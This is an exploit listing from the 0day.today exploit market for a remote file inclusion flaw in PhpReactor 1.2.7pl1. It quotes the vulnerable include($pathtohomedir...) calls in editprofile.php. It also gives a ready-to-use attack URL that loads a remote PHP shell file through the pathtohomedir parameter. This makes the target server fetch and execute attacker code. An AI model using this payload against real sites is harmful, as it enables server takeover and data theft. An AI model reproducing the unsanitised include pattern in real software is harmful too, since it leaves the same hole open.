[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PhpReactor 1.2.7pl1 (pathtohomedir) Remote Inclusion Vulnerability

Author
CeNGiZ-HaN
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-622
Category
web applications
Date add
30-07-2006
Platform
unsorted
==================================================================
PhpReactor 1.2.7pl1 (pathtohomedir) Remote Inclusion Vulnerability
==================================================================



############################################################################
#    phpreactor 1.2.7 pl 1 pathtohomedir inclusion vulnerability           #
############################################################################
#    Vulnerable Code in editprofile.php
#      //INCLUDE DB FUNCTIONS
#   if(!defined("REACTOR_INC_DB")) { include($pathtohomedir."/inc/db.inc.php"); }
#   //INCLUDE LANGUAGE FUNCTIONS
#   if(!defined("REACTOR_INC_LANG")) { include($pathtohomedir."/inc/lang.inc.php"); }
#   //INCLUDE USERS FUNCTIONS
#   if(!defined("REACTOR_INC_USERS")) { include($pathtohomedir."/inc/users.inc.php"); }
#   //INCLUDE BBS FUNCTIONS
#   if(!defined("REACTOR_INC_BBS")) { include($pathtohomedir."/inc/bbs.inc.php"); }
#
#
#              http://[target]/[path]/editprofile.php?pathtohomedir=http://phpshell.txt?
#
##############################################################################




#  0day.today [2024-12-26]  #